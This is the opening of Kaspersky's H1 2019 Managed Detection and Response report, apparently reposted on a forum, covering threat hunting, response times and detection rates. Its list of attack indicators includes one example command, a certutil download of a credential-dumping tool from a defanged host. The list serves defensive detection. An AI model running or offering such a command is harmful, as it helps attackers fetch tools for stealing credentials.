Managed Detection and Response analytics report, H1 2019

[harlan4096]

CONTENTS
Introduction
Life cycle of a threat hunting hypothesis
Geography and industry verticals of the MDR service delivered by Kaspersky
Incident detection operations
MTTR in view of incident severity
Things to note
Effectiveness of detection technologies
Incident distribution by event source (sensors)
Highlights
Statistics on incident severity level distributed by detection technology
Statistics on attack tactics used in incidents of different severity (high, medium, low) at the time of detection
Highlights
Effectiveness of MITRE ATT&CK in security operations
Kaspersky MDR service description
Detection technologies
Monitoring process

Introduction

This report contains the results of the Managed Detection and Response (MDR) service (brand name – Kaspersky Managed Protection). The MDR service provides managed threat hunting and initial incident response. Threat hunting is the practice of iteratively searching through data collected from sensors (referenced as telemetry or events) in order to detect threats that successfully evade automatic security solutions. A brief description of the service is provided at the end of this document.

The MDR service processes security operations events, focusing on and improving activity performed by professionals in charge of threat hunting projects, their level of expertise and the threat intelligence enabled through the detection process. According to David Bianco’s Pyramid of Pain, TTP-based threat detection is the most difficult type of indicators of attacks (IoAs) to circumvent for an adversary. The Kaspersky team is focused on TTP-based threat hunting in its MDR service, where humans are heavily involved to ensure the best judgments are made on collected events, especially advanced threats. This significantly augments automatic detection logic provided by endpoint protection products (EPP) used as sensors during the service delivery.

Geography and industry verticals of the MDR service delivered by Kaspersky

The analysis was conducted based on data from organizations around the world that used our service in the first half of 2019. Government bodies, financial institutions, industrial organizations, telecommunication and IT companies worldwide use our service to protect their IT infrastructure. Data from organizations that used our services for frequent health checks was also included.

Incident detection operations

Almost all alerts were generated by the analysis of events from endpoint sensors based on IoAs (TTP-based threat detection logic) and less than 2% of them were identified as cybersecurity incidents.

The low IoA conversion rate reflects the need to detect advanced threats which use a ‘living off the land’ approach, with behaviors that are very similar to legitimate activity. The more a malicious behavior mimics the normal behavior of users and administrators, the higher the rate of false positives and, consequently, the lower the conversion rate from alerts.

Mean time to response (MTTR)

(or incident processing time) is the time from an automatic alert generation as a result of automated analysis of events to its resolution by Kaspersky experts.

~25 mins average MTTR

It is worth noting that incident investigation may include additional work on the customer side or extra expert analysis and it may require more time for resolution – on average, up to 37 minutes in cases of incidents associated with advanced threats or sophisticated attack detection.

Examples of IoAs:

* Start command line (or bat/PowerShell) script within a browser, office application or server application (such as SQL server, SQL server agent, nginx, JBoss, Tomcat, etc.);

* Suspicious use of certutil for file download (example command: certutil -verifyctl -f -split https[:]//example.com/wce.exe);

* File upload with BITS (Background Intelligent Transfer Service);

* whoami command from SYSTEM account, and many others.
...

Continue Reading
Full PDF Report